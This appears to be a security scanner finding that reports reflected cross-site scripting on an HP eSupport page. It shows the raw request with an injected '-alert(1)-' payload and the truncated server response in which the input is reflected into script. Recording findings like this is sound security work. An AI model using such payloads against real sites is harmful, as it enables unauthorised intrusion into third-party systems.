1. Cross-site scripting (reflected)
Severity: | High |
Confidence: | Certain |
Host: | http://h10025.www1.hp.com |
Path: | /ewfrf/wc/siteHome |
GET /ewfrf/wc/siteHome7b0e0"-alert(1)- Host: h10025.www1.hp.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 404 Not Found Date: Wed, 05 Jan 2011 17:26:31 GMT Server: Apache Cache-Control: max-age=7200 Expires: Wed, 05 Jan 2011 19:26:31 GMT Connection: close Content-Type: text/html;charset=utf-8 Content-Length: 52315 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR ...[SNIP]... <!-- /* Variables set on all eSupport pages. */ var s_channel="CES"; var s_pageName="CES:404:http: var s_pageType="errorPage"; var s_eVar46=s_pageName; var s_eVar1="us" + '/' + "en" + '/'; var s_eVar29=""; var s_eVar48=""; var s_prop46="D=v48"; var s_prop27=""; var s_eVar49="" ...[SNIP]... |